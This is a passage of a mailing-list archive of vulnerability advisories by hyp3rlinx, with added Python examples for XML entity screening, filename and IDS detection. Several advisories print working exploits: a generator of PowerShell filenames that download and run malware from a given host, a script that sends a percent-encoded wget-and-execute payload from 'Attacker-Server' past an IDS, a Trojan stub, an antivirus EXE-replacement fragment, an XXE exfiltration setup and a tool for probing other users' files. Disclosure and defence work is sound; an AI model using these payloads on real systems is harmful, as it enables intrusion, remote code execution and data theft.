    if (size){
      printf("[+] Copying exploit to vuln dir...\n");
      Sleep(1000);
      CopyFile(fname, TARGET, FALSE);   /* overwrite the product EXE; the weak ACL allows it */
      printf("[+] Replaced legit Max Secure EXE...\n");
      Sleep(2000);
      printf("[+] Done!\n");
      MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
      Sleep(1000);
      exit(0);
    }
  }else{
    if(FileExists(TMP)){
      remove(TMP);
    }
    printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
    printf("[+] hyp3rlinx\n");
    system("pause");
  }
  return 0;
}


[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure




hyp3rlinx


Microsoft Excel 2016 v1901 Import Error XML External Entity Injection

2019-12-02 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.microsoft.com


[Product]
Excel 2016 v1901

Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, 
Android and iOS.
It features calculation, graphing tools, pivot tables, and a macro programming 
language called Visual Basic for Applications. 


[CVE]
N/A


[Vulnerability Type]
Error Import Based XML External Entity Injection


[Security Issue]
Excel query from file feature is vulnerable to "Error" based XML External 
Entity attacks, if the user chooses the "Import as
Html page" functionality upon receiving errors importing a specially crafted 
XML file.

This can result in potential remote data exfiltration, user interaction is 
required to exploit this vulnerability.

Tested successfully on Windows 10 with .NET Framework v4.0.30319.

C:\>dir /b %windir%\Microsoft.NET\Framework\v*
v4.0.30319


[Exploit/POC]
Create a new ".xlsx" file, then go to the Data tab, choose 'New Query/From File/From XML'
and select the malicious XML file below.

1) You will get an error like:

"Error:

Unable to connect

We encountered an error while trying to connect."

2) Excel will then give you the option to 'Edit' and import the file as an 'Html Page'
from the drop-down menu.

Once the user chooses to import as HTML, the XXE attack succeeds and local data
(here the first lines of win.ini) is sent to the remote server, e.g. the attacker's
HTTP server log shows:

127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO HTTP/1.1" 200 -


Malicious XML file to load as New Data Query

"test.xml"



http://127.0.0.1:8000/payload.dtd'>
%dtd;]>
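A pre-screen for untrusted XML-based files, as an added example that covers both the Media Center .mcl payload of the earlier advisory and the test.xml query file above (it is not the advisory's code and not how Media Center or Excel parse XML): it drives Python's expat with parameter-entity parsing switched on and an external-entity handler that records each SYSTEM identifier instead of fetching it, so every external general or parameter entity declaration and every attempt to pull an external DTD is reported without any file or network access. The embedded samples are constructed stand-ins for the .mcl and the DTD chain, with `attacker.invalid` as the host and the entity names borrowed from the advisory.

```python
import xml.parsers.expat as expat

# Constructed stand-in for a malicious .mcl / .xml: the parameter-entity chain of the
# advisories (local file read via %data666, external DTD fetch via %param666).
MALICIOUS_SAMPLE = b"""<?xml version="1.0"?>
<!DOCTYPE application [
  <!ENTITY % data666 SYSTEM "file:///C:/Windows/win.ini">
  <!ENTITY % param666 SYSTEM "http://attacker.invalid/FindMeThatBiotch.dtd">
  %param666;
]>
<application/>
"""

# Constructed benign file: an internal entity only, which needs no external access.
BENIGN_SAMPLE = b"""<?xml version="1.0"?>
<!DOCTYPE application [
  <!ENTITY vendor "Example Corp">
]>
<application title="&vendor;"/>
"""


def external_references(data: bytes) -> list:
    """Every external entity declaration or reference expat sees in `data`, as
    ("decl"|"ref"|"error", name-or-context, system id) tuples. Nothing is fetched."""
    findings = []
    parser = expat.ParserCreate()
    # Make expat report parameter-entity references (the %param666; step) instead of
    # silently skipping them; our handler below still never resolves anything.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            findings.append(("decl", ("%" if is_param else "&") + name, system_id))

    def external_ref(context, base, system_id, public_id):
        findings.append(("ref", context, system_id))
        return 1   # "handled": expat continues without the entity's content

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError as err:
        findings.append(("error", None, str(err)))   # malformed input is also a reason to refuse
    return findings


def is_safe_to_open(data: bytes) -> bool:
    """True only when the document declares and references nothing external."""
    return not external_references(data)


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, "->", external_references(sample) or "clean")
```

The scan reports the file:// declaration, the http:// declaration and the attempted external-DTD fetch for the first sample and nothing for the second; a file that fails `is_safe_to_open` should not be handed to Media Center, Excel's query importer, or any other parser that resolves entities, regardless of whether it carries a mark-of-the-web.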




[Network Access]
Local


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification: May 10, 2019
MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security 
Release.
Engineering Team may or may not fix in a future version of the release."
November 30, 2019 : Public Disclosure




hyp3rlinx


Trend Micro Anti-Threat Toolkit <= v1.62.0.1218 / Remote Code Execution 0day

2019-10-21 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
[+] ISR: Apparition Security  
 

[Vendor]
www.trendmicro.com


[Product]
Trend Micro Anti-Threat Toolkit (ATTK)
1.62.0.1218 and below

Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean 
infections.
It can be used to perform system forensic scans and clean the following 
infection types:

General malware infection
Master boot record Infection
CIDOX/ RODNIX infection
Rootkit infection
Zbot infection
Cryptolocker infection
etc..


[Vulnerability Type]
Remote Code Execution


[CVE Reference]
CVE-2019-9491


[Security Issue]
Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if
a malware author happens to use the vulnerable naming convention of "cmd.exe" or
"regedit.exe" and the malware is placed in the vicinity of the ATTK when a scan is
launched by the end user.

Since the ATTK is signed by a verified publisher and therefore assumed trusted, any
MOTW security warnings are bypassed if the malware was downloaded from the internet.
It can also become a persistence mechanism, as each time the Anti-Threat Toolkit is
run, so is the attacker's malware.

Standalone affected components of ATTK and other integrations (e.g. WCRY Patch 
Tool, OfficeScan Toolbox, etc.)

attk_collector_cli_x64.exe 
Hash: e8503e9897fd56eac0ce3c3f6db24fb1

TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f

attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed


[References]
https://success.trendmicro.com/solution/000149878
*All versions of the ATTK have been updated with the newer version. Anti-Threat 
Toolkit (ATTK) 1.62.0.1223


[Exploit/POC]
Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or 
"regedit.exe".
Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file 
get loaded and executed.

#include <stdio.h>
#include <windows.h>

int main(void){
   puts("Trend Micro Anti-Threat Toolkit PWNED!");
   puts("Discovery: hyp3rlinx");
   puts("CVE-2019-9491\n");
   WinExec("powershell", 0);   /* 0 = SW_HIDE */
   return 0;
}


[POC Video URL]
https://www.youtube.com/watch?v=HBrRVe8WCHs


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: September 9, 2019
Vendor confirms vulnerability: September 25, 2019
Vendor requests to coordinate advisory: September 25, 2019
October 19, 2019 : Public Disclosure




hyp3rlinx


NtFileSins v2.1 Windows NTFS Privileged File Access Enumeration Tool

2019-09-10 Thread apparitionsec
from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2.1
# Fixed: save() logic to log report in case no Zone.Identifiers found.
# Added: Check for Zone.Identifer:$DATA to see if any identified files were 
downloaded from internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# whether or not the file exists, when restricted access is attempted by another user.
#
# However, by accessing files directly, attempting to "open" them from the cmd.exe shell,
# we can determine existence by comparing the inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
#               2) artifacts must contain a dot "." or false positives are returned.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin, so this script is not required.
#
# Profile other users by comparing NTFS error messages to potentially learn their activities or a machine's purpose.
# For evil, or maybe to check for basic malware IOC existence on disk with user-only rights.
#
#==#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1   #
# By John Page (aka hyp3rlinx) #
# Apparition Security  #
#==#

BANNER='''
_   ___ ___ _   
   / | / /_  __/ (_) /__ / ___/(_)___  _
  /  |/ / / / / /_  / / / _ \\__ \ / / __ \/ ___/
 / /|  / / / / __/ / / /  __/__/ / / / / (__  ) 
/_/ |_/ /_/ /_/   /_/_/\___//_/_/ /_//  v2.1
 
 By hyp3rlinx
 ApparitionSec  
   
'''  

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"

USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
           "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]

APPDATA_DIR=["AppData/Local/Temp"]

EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",".bat",
            ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])

REPORT="NtFileSins_Log.txt"

def usage():
    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
    print '-u victim -a ""'
    print "-u victim -d Downloads -a  -s"
    print '-u victim -d Contacts -a "Mike N.contact"'
    print "-u victim -a APT.txt -b -n"
    print "-u victim -d -z Desktop/MyFiles -a  <.name>"
    print "-u victim -d Searches -a .search-ms"
    print "-u victim -d . -a "
    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
    print "-u victim -d Downloads -a APT.exe -b"
    print "-u victim -f list_of_files.txt"
    print "-u victim -f list_of_files.txt -b -s"
    print "-u victim -f list_of_files.txt -x .txt"
    print "-u victim -d desktop -f list_of_files.txt -b"
    print "-u victim -d desktop -f list_of_files.txt  -x .rar"
    print "-u victim -z -s -f list_of_files.txt"

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")

NtFileSins / Windows NTFS Privileged File Access Enumeration Tool

2019-09-10 Thread apparitionsec
from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2
# Added: Check for Zone.Identifier:$DATA to see if any identified files were downloaded from internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by comparing inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges.
#               2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message"  OR  "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by comparing ntfs error messages to potentially learn their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
#
#======================================================================#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.    #
# By John Page (aka hyp3rlinx)                                         #
# Apparition Security                                                  #
#======================================================================#

BANNER='''
_   ___ ___ _   
   / | / /_  __/ (_) /__ / ___/(_)___  _
  /  |/ / / / / /_  / / / _ \\__ \ / / __ \/ ___/
 / /|  / / / / __/ / / /  __/__/ / / / / (__  ) 
/_/ |_/ /_/ /_/   /_/_/\___//_/_/ /_//  v2  
   
 By hyp3rlinx
 ApparitionSec  
   
'''  

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"

USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
           "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]

APPDATA_DIR=["AppData/Local/Temp"]

EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",".bat",
            ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])

REPORT="NtFileSins_Log.txt"

def usage():
    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
    print '-u victim -a ""'
    print "-u victim -d Downloads -a  -s"
    print '-u victim -d Contacts -a "Mike N.contact"'
    print "-u victim -a APT.txt -b -n"
    print "-u victim -d -z Desktop/MyFiles -a  <.name>"
    print "-u victim -d Searches -a .search-ms"
    print "-u victim -d . -a "
    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
    print "-u victim -d Downloads -a APT.exe -b"
    print "-u victim -f list_of_files.txt"
    print "-u victim -f list_of_files.txt -b -s"
    print "-u victim -f list_of_files.txt -x .txt"
    print "-u victim -d desktop -f list_of_files.txt -b"
    print "-u victim -d desktop -f list_of_files.txt  -x .rar"
    print "-u victim -z -s -f list_of_files.txt"

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
    parser.add_argument("-t", "--appdata", nargs="?", 
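The error-message oracle that both NtFileSins posts (v2 above and v2.1 before it) are built on, reduced to its core as an added example. This is not the tool's own code: it classifies cmd.exe's reply to a direct "open" of a path inside another user's profile, and the sample replies, the `victim` profile and the candidate file names are constructed here. The exact wording of the first two messages is the usual cmd.exe text and is an assumption.

```python
import subprocess
import sys

EXISTS, ABSENT, SAME_PRIV, UNKNOWN = "exists", "absent", "same-privilege", "unknown"

# Constructed sample outputs of `cmd.exe /c <path>` for a standard user probing another
# user's profile. The three message classes are the ones the NtFileSins comments list.
SAMPLE_OUTPUTS = {
    r"c:\Users\victim\Desktop\report.docx": "Access is denied.",
    r"c:\Users\victim\Desktop\missing.txt": "The system cannot find the file specified.",
    r"c:\Users\victim\Desktop\tool.bin":
        "'c:\\Users\\victim\\Desktop\\tool.bin' is not recognized as an internal or external command,\n"
        "operable program or batch file.",
}

def classify(cmd_output):
    """Map cmd.exe's reply to a direct 'open' of a path onto an existence verdict.

    The oracle only works when the prober has fewer rights than the profile owner:
    with equal rights cmd.exe either launches the file (no message at all) or prints
    'is not recognized ...', and neither says anything about the file.
    """
    t = cmd_output.strip().lower()
    if not t:
        return SAME_PRIV
    if "access is denied" in t:
        return EXISTS
    if "cannot find the file" in t or "cannot find the path" in t:
        return ABSENT
    if "is not recognized as an internal or external command" in t:
        return SAME_PRIV
    return UNKNOWN

def sample_run(path):
    """Offline stand-in for cmd.exe that replays the constructed outputs above."""
    return SAMPLE_OUTPUTS.get(path, "The system cannot find the file specified.")

def cmd_run(path):
    """Real probe: ask cmd.exe to 'open' the path and return everything it printed.
    Only point this at a more privileged user's profile: with equal rights the file
    really is launched, which is not what an enumeration tool wants."""
    p = subprocess.run(["cmd.exe", "/c", path], capture_output=True, text=True)
    return (p.stdout or "") + (p.stderr or "")

def enumerate_artifacts(user, names, dirs=("Desktop", "Downloads"), run=None):
    """Return {path: verdict} for every candidate, skipping names without a '.'
    (the script's own false-positive rule: extension-less names resolve as commands)."""
    if run is None:
        run = cmd_run if sys.platform.startswith("win") else sample_run
    results = {}
    for d in dirs:
        for n in names:
            if "." not in n:
                continue
            path = r"c:\Users\%s\%s\%s" % (user, d, n)
            results[path] = classify(run(path))
    return results

if __name__ == "__main__":
    hits = enumerate_artifacts("victim", ["report.docx", "missing.txt", "noext"], dirs=("Desktop",))
    for path, verdict in hits.items():
        print("%-45s %s" % (path, verdict))
```

On Windows, run it as a standard user against an administrator's profile; anywhere else it replays the constructed replies so the classification logic can be exercised offline.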

Microsoft Windows PowerShell Unsanitized Filename Command Execution

2019-08-05 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: Apparition Security  
 

[Vendor]
www.microsoft.com


[Product]
Windows PowerShell

Windows PowerShell is a Windows command-line shell designed especially for 
system administrators.
PowerShell includes an interactive prompt and a scripting environment that can 
be used independently or in combination.


[Vulnerability Type]
Unsanitized Filename Command Execution


[CVE Reference]
N/A


[Security Issue]
PowerShell can potentially execute arbitrary code when running specially named 
scripts due to trusting unsanitized filenames.
This occurs when ".ps1" files contain semicolons ";" or spaces as part of the 
filename, causing the execution of a different trojan file;
or the running of unexpected commands straight from the filename itself without 
the need for a second file.

The trojan file doesn't need to be another PowerShell script; it can be any of ".com, .exe, .bat, .cpl, .js, .vbs and .wsf".
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.

However, when such scripts are run from PowerShell's own shell and not "cmd.exe", the "&" (call operator) will block our exploit from working.

Still, if the user has enabled ".ps1" scripts to open with PowerShell as their default program, all it takes is a double click on the file to trigger
the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
by default, then running the script from cmd.exe like c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.

My PoC will download a remote executable, save it to the victim's machine and then execute it; the PS file's contents are irrelevant.
Also, note I use "%CD%" to target the current working directory where the victim initially opened it; after it calls "iwr" (invoke-webrequest,
abbreviated for space) it sleeps for 2 seconds and finally executes.

C:\>powershell 
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell 
iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

This can undermine the integrity of PowerShell as it potentially allows unexpected code execution, even when the script's contents are visually reviewed.
We may also be able to bypass some endpoint protection or IDS systems that look at the contents or header of a file but not its filename, where our
commands can be stored.

For this to work the user must have enabled PowerShell as its default program 
when opening ".ps1" files.

First, we create a Base64 encoded filename for obfuscation; that will download 
and execute a remote executable named in this case "n.exe".
c:\>powershell 
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell 
iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

Give the PS script a normal beginning name, then separate commands using ";" semicolons, e.g.

Test;powershell -e ;2.ps1

Create the executable without a file extension to save space for the filename 
then save it back using the -O parameter.
The "-e" is abbreviated for EncodedCommand to again save filename space.

Host the executable on web-server or just use python -m SimpleHTTPServer 80 or 
whatever.
Double click to open in PowerShell watch the file get downloaded saved and 
executed!

My example is used as a "filename embedded downloader", but obviously we can 
just call other secondary trojan files of various types in the same directory.

Note: User interaction is required, and obviously running any random PS script 
is dangerous... but hey we looked at the file content and it simply printed a 
string!


[Exploit / PoC]
from base64 import b64encode
import argparse,sys
#Windows PowerShell - Unsanitized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    return parser.parse_args()

def main(args):
    PSEmbedFilenameMalwr=""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
        #UTF-16LE then Base64: the encoding PowerShell's -e (EncodedCommand) expects
        b64 = b64encode(PSEmbedFilenameMalwr.encode("utf-16-le"))
        #filename shape as described above: Test;powershell -e <base64>;2.ps1
        print "Test;powershell -e "+b64+";2.ps1"

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print "[*] No args supplied see Help -h"
        exit()
    main(parse_args())
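The filename mechanics described above, as an added example that is not the advisory's PoC: `encoded_command_filename` rebuilds the `Test;powershell -e <base64>;2.ps1` shape around the page's `iwr ... ;sleep -s 2;start` command, `statements` shows how a name like `.\Hello;World.ps1` splits into two commands, and `decode_embedded_commands` / `is_suspicious_ps1_name` are the defender's side: recover and flag commands carried in a script's name rather than its content. `filename_problems` adds the check the attacker needs too, since NTFS rejects `/` (which base64 can emit) and name components over 255 characters. The IP and file names are the advisory's examples; the detection regex and the reserved-character list are assumptions.

```python
import base64
import re

def encoded_command_filename(ip, remote_name, local_name, prefix="Test", suffix="2"):
    """Rebuild the advisory's filename: <prefix>;powershell -e <base64 of UTF-16LE command>;<suffix>.ps1"""
    cmd = "powershell iwr %s/%s -O %%CD%%\\%s ;sleep -s 2;start %s" % (ip, remote_name, local_name, local_name)
    b64 = base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")
    return "%s;powershell -e %s;%s.ps1" % (prefix, b64, suffix)

def statements(filename):
    """The statements PowerShell sees when the bare filename is parsed as a command line."""
    return [s.strip() for s in filename.split(";") if s.strip()]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (assumed detection pattern)
ENCODED = re.compile(r"(?i)\bpowershell(?:\.exe)?\s+-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

def decode_embedded_commands(filename):
    """Decode every -EncodedCommand blob hidden in a filename (empty list if none)."""
    out = []
    for stmt in statements(filename):
        m = ENCODED.search(stmt)
        if m:
            try:
                out.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
            except (ValueError, UnicodeDecodeError):
                out.append("<undecodable blob>")
    return out

RESERVED = set('<>:"/\\|?*')   # characters NTFS will not accept in a name component

def filename_problems(filename):
    """Why the crafted name may not even be creatable: reserved characters (base64 can
    emit '/') and the 255-character component limit."""
    problems = []
    bad = sorted(RESERVED & set(filename))
    if bad:
        problems.append("reserved characters: " + "".join(bad))
    if len(filename) > 255:
        problems.append("component longer than 255 characters")
    return problems

def is_suspicious_ps1_name(filename):
    """Detection rule: a .ps1 whose name splits into several statements or carries an encoded command."""
    if not filename.lower().endswith(".ps1"):
        return False
    return len(statements(filename)) > 1 or bool(decode_embedded_commands(filename))

if __name__ == "__main__":
    name = encoded_command_filename("192.168.1.10", "n", "n.exe")
    print(name)
    print("decodes to:", decode_embedded_commands(name))
    print("problems:", filename_problems(name) or "none")
```

Run the detection half over the names in a share or mail gateway quarantine; the generation half shows why a name-only rule is enough to catch this class, because the payload never touches the file's contents.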

Trend Micro Deep Discovery Inspector IDS / Percent Encoding IDS Bypass

2019-07-24 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt
[+] ISR: Apparition Security 
 

[Vendor]
www.trendmicro.com


[Product]
Deep Discovery Inspector

Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks
moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C&C) communications, and evasive attacker
activities that are invisible to standard security defenses.



[Vulnerability Type]
Percent Encoding IDS Bypass


[CVE Reference]
Vendor decided not to release a CVE


[Security Issue]
Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection", and they will be flagged as high.
Attacker payloads sent as plain ASCII characters, for example "wget", or even HEX encoded like "\x77\x67\x65\x74", will still get flagged and alerted on.

However, attackers can easily bypass these alerts by sending malicious commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74", which also
translates to "wget" but will not get flagged or alerted on, and may still be processed on the target system.

e.g.

DDI RULE 2452 
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452

Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is still run by the vulnerable target if the payload is encoded using percent/hex encoding like %77%67%65%74.
That will not only bypass the IDS, with no alert triggered or notification sent, but the application will still process the malicious command.

Importantly, the "wget" DDI Rule 2452 used is just an example and can potentially be any malicious request where the IDS checks the character encodings but fails to account for
percent encoded HEX character payload values.


[Exploit/POC]
from socket import *
#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC
#Discovery: hyp3rlinx - ApparitionSec
#Apparition Security
#Firewall Rule Bypass

IP = raw_input("[+] Trend Micro IDS")
PORT = 80

#"%77%67%65%74" is percent-encoded "wget"; the rest of the command is percent-encoded the same way
payload="/index.php?s=/index/vulnerable/app/invoke=call_user_func_array[0]=system[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;"
req = "GET "+payload+" HTTP/1.1\r\nHost: "+IP+"\r\nConnection: close\r\n\r\n"

s=socket(AF_INET, SOCK_STREAM)
s.connect((IP, PORT))
s.send(req)

#read until the server closes the connection (recv returns an empty string)
while True:
    res = s.recv(512)
    if not res:
        break
    print res

s.close()


#Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered.
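The detection side of this bypass, as an added example that is neither the advisory's nor Trend Micro's code: a substring rule run on the raw request line misses `%77%67%65%74`, while the same rule run after canonicalization (percent-decoding plus `\xNN` unescaping, repeated a bounded number of times so double encoding such as `%2577` is also unwrapped) catches it. The signature strings and the sample request line are constructed here; the real DDI rule content is not on the page.

```python
import re
from urllib.parse import unquote

# Toy signatures standing in for the "Wget Commandline Injection" rule; matched on a lowercased request line.
SIGNATURES = ("wget ", "chmod ")

# \x77-style escapes, which the advisory says the IDS already handles
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

def naive_match(request_path):
    """What a substring rule sees when applied to the raw request line."""
    t = request_path.lower()
    return [s for s in SIGNATURES if s in t]

def canonicalize(request_path, max_rounds=3):
    """Decode percent-encoding and \\xNN escapes until the text stops changing.
    The round limit keeps %2525... nesting from stalling the detector."""
    cur = request_path
    for _ in range(max_rounds):
        nxt = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), unquote(cur))
        if nxt == cur:
            break
        cur = nxt
    return cur

def normalized_match(request_path):
    """Same rule, applied after canonicalization: the check that closes the bypass."""
    return naive_match(canonicalize(request_path))

# Constructed request line modelled on the PoC above: "wget ... chmod 0777 ..." percent-encoded.
SAMPLE_REQUEST = ("/index.php?cmd=%77%67%65%74%20http://attacker/x.sh%20-O%20/tmp/a;"
                  "%20chmod%200777%20/tmp/a;%20/tmp/a")

if __name__ == "__main__":
    print("raw match:       ", naive_match(SAMPLE_REQUEST))
    print("canonical form:  ", canonicalize(SAMPLE_REQUEST))
    print("normalized match:", normalized_match(SAMPLE_REQUEST))
```

The point generalizes beyond wget: any rule that matches on bytes must first bring the request into the form the target application will actually interpret, and the target here percent-decodes the query before handing it to `system`.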



[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: May 14, 2019
Vendor confirmed the IDS Bypass: May 20, 2019
Vendor informed that a DDI IDS enhancement has been made: July 18, 2019
July 23, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


CVE-2019-13577 / MAPLE Computer WBT SNMP Administrator v2.0.195.15 / Unauthenticated Remote Buffer Overflow Code Execution 0day

2019-07-18 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
[+] ISR: Apparition Security
 

[Vendor]
www.computerlab.com


[Product]
MAPLE Computer WBT SNMP Administrator (Thin Client Administrator)
v2.0.195.15

https://www.computerlab.com/index.php/downloads/category/27-device-manager
ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
